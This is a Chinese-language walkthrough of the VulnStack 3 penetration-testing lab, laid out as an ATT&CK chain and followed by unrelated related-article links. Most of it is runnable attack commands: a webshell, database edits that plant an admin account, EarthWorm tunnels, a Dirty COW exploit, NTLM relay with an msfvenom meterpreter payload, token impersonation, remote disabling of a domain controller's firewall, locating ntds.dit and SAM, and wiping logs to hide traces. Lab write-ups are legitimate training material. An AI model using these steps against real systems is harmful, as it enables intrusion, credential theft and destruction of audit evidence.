当前位置: 首页 > news >正文

红日靶场三实战:从MySQL泄露到域控提权的完整ATTCK链路解析

红日靶场三深度实战:从Web渗透到域控提权的ATT&CK战术拆解

1. 靶场环境与攻击路径全景

红日安全团队设计的VulnStack靶场系列已成为渗透测试人员进阶训练的黄金标准。第三套靶场环境模拟了典型企业混合架构——外网Web服务器(CentOS+Ubuntu双机负载)、内网域环境(Windows Server 2012域控+Windows 7工作站+Windows Server 2008应用服务器)组成的攻防演练场景。

核心攻击链路由五个关键阶段构成

  1. 外网Web应用突破(MySQL凭据泄露→后台getshell)
  2. 内网代理搭建(EarthWorm反向隧道)
  3. Linux提权作战(脏牛漏洞利用)
  4. 横向移动渗透(NTLM Relay攻击链)
  5. 域控终极控制(Token窃取+防火墙绕过)

攻击者需要依次突破三层防御圈:

  • 外网Web应用层(80/3306端口)
  • 内网Linux服务器(Ubuntu+CentOS)
  • Windows域环境(2008→2012渗透路径)

实验环境配置要点:所有内网主机采用Host-Only模式(192.168.93.0/24),Kali攻击机通过双网卡桥接实现内外网访问。

2. Web突破:从MySQL泄露到Webshell获取

2.1 信息收集与漏洞定位

端口扫描显示目标开放关键服务:

nmap -sV 192.168.119.118
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS)) 3306/tcp open mysql MySQL 5.6.51

目录扫描发现Joomla后台路径:

http://192.168.119.118/administrator/index.php

突破关键:通过配置文件泄露获取数据库凭据

http://192.168.119.118/configuration.php
public $user = 'testuser'; public $password = 'cvcvgjASD!@'; public $db = 'joomla_db';

2.2 MySQL注入攻击实战

使用泄露凭据远程登录数据库:

mysql -h 192.168.119.118 -u testuser -p'cvcvgjASD!@'

执行权限提升操作:

-- 修改管理员密码(需MD5加密) UPDATE joomla_users SET password = MD5('Admin@123') WHERE username = 'admin'; -- 添加新管理员账户 INSERT INTO joomla_users (username, password, name, email) VALUES ('hacker', MD5('P@ssw0rd'), 'Pentester', 'test@example.com'); -- 分配超级用户权限 INSERT INTO joomla_user_usergroup_map (user_id, group_id) VALUES ((SELECT id FROM joomla_users WHERE username='hacker'), 8);

2.3 Webshell部署与绕过技巧

通过Joomla模板编辑器植入PHP后门:

<?php // 混淆型一句话木马 $c = $_REQUEST['x']; if(isset($c)){ system(base64_decode($c)); } ?>

disable_functions绕过方案

  1. 上传LD_PRELOAD劫持so文件
  2. 使用蚁剑插件"绕过disable_functions"
  3. 通过PHP-FPM未授权访问漏洞

最终获取的Webshell权限信息:

whoami # www-data id # uid=33(www-data) gid=33(www-data) groups=33(www-data)

3. 内网渗透:代理搭建与提权作战

3.1 网络拓扑探测

通过Webshell执行内网扫描:

ifconfig # eth0: 192.168.119.118 # eth1: 192.168.93.100 arp -a # 192.168.93.20 (Win2008) # 192.168.93.30 (Win7) # 192.168.93.10 (Win2012)

3.2 隧道搭建实战

使用EarthWorm建立三级级联代理:

# 攻击机执行 ./ew -s lcx_listen -l 1080 -e 8888 # 跳板机执行 ./ew -s lcx_slave -d 攻击机IP -e 8888 -f 内网IP -g 9999 # 目标内网执行 ./ew -s rssocks -d 跳板机IP -e 9999

代理配置验证:

proxychains nmap -sT -Pn 192.168.93.10

3.3 脏牛提权全流程

漏洞验证

uname -a # Linux web-centos 3.10.0-1127.el7.x86_64 grep -i dirty /proc/version

提权操作

gcc -pthread dirty.c -o dirty -lcrypt ./dirty myNewPassword

提权后关键操作:

cat /etc/shadow ssh-keygen -t rsa -f /root/.ssh/id_rsa

4. 横向移动:NTLM Relay攻击链详解

4.1 攻击原理与环境准备

NTLM Relay三要素

  1. SMB签名未强制启用
  2. 内网存在特权账户
  3. 可诱导用户访问恶意服务器

工具准备:

git clone https://github.com/SecureAuthCorp/impacket cd impacket/examples

生成恶意payload:

msfvenom -p windows/x64/meterpreter/bind_tcp \ LHOST=192.168.93.100 LPORT=4444 -f exe > shell.exe

4.2 攻击实施步骤

启动SMB中继服务:

python3 smbrelayx.py -h 192.168.93.20 -e ./shell.exe

MSF配置监听:

use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.93.20 set LPORT 4444 run

触发条件:当域用户访问\192.168.93.100时,自动完成:

  1. 凭证窃取
  2. 哈希中继
  3. payload投递

4.3 后渗透关键操作

获取域管理员Token:

load incognito list_tokens -u impersonate_token "TEST\\Administrator"

定位域控制器:

net group "Domain Controllers" /domain

5. 域控突破:从权限提升到数据窃取

5.1 防火墙绕过技术

通过WMI远程关闭防护:

Invoke-WmiMethod -ComputerName DC01 -Class Win32_Process -Name Create -ArgumentList "netsh advfirewall set allprofiles state off"

5.2 敏感数据定位技巧

域控常见数据存储位置

\\DC01\C$\Users\Administrator\Documents \\DC01\C$\Windows\NTDS\ntds.dit \\DC01\C$\Windows\System32\config\SAM

使用PowerShell搜索机密文件:

Get-ChildItem -Path C:\ -Recurse -Include *.doc,*.xls,*.pdf -Force -ErrorAction SilentlyContinue | Select-Object FullName

5.3 痕迹清理方案

Linux系统

history -c rm -rf /var/log/auth.log

Windows系统

wevtutil cl Security wevtutil cl System
http://www.cnnetsun.cn/news/1404786.html

相关文章:

  • ccmusic-database/music_genre高可用方案:多实例负载均衡与健康检查配置
  • 华为路由器静态路由配置实战:从入门到精通(含常见错误排查)
  • Vue3如何扩展WebUploader支持汽车设计图纸的跨平台断点续传与状态同步?
  • chandra实际作品展示:带坐标定位的图像标题识别
  • ComfyUI新手体验:无需配置,快速生成高质量AI图片
  • Oracle主键自增的4种实现方式及最佳实践
  • WPF动画实战:用Storyboard实现按钮点击后的渐变消失效果(附完整代码)
  • OWL ADVENTURE开发环境搭建:IDEA中Python插件与远程调试配置
  • MogFace人脸检测模型AI模型对比评测:从YOLOv8到最新人脸检测方案
  • 技术文章大纲模板技术原理
  • AudioSeal Pixel Studio完整指南:抗重采样/转码/混音的鲁棒性验证
  • 思源笔记AI配置避坑指南:如何用CZL API绕过OpenAI限制(最新调用地址)
  • 期货量化交易实战策略解析:从经典到创新
  • BBmap比对工具高效使用技巧:如何优化参数提升测序数据分析速度
  • 次元画室生成作品的后处理:使用开源工具进行批量优化
  • SpringBoot3项目如何快速集成Knife4j?5分钟搞定API文档增强
  • Ubuntu 20.04下gst-rtsp-server完整安装指南(含常见依赖问题解决)
  • 5G时代如何DIY一个宽带圆极化天线?从参数优化到实测效果全记录
  • Qwen-Image镜像部署教程:RTX4090D单卡跑通Qwen-VL-Chat多轮对话服务
  • 丹青识画系统MySQL分析结果存储方案:亿级图像数据管理实践
  • Ubuntu下adb/fastboot报错终极解决指南:从udev规则配置到设备权限修复
  • 芯片时序的微观世界:从Setup/Hold负值到时钟数据路径的博弈
  • LiuJuan20260223Zimage模型微调实战教程
  • PasteMD保姆级教程:从部署到实战,轻松美化任何文本
  • Cesium Ion密钥申请全攻略:从注册到代码配置的完整流程
  • SOONet模型在C盘空间优化中的应用:清理无效视频缓存文件
  • Linux嵌入式网络监控工具实战指南:从命令行到图形化
  • Uvicorn日志双输出实战:5分钟搞定终端+文件记录(FastAPI项目必备)
  • GTE-Pro语义相似度计算优化:Faiss向量检索实战
  • Privoxy+SOCKS5实战:如何打造更安全的匿名上网环境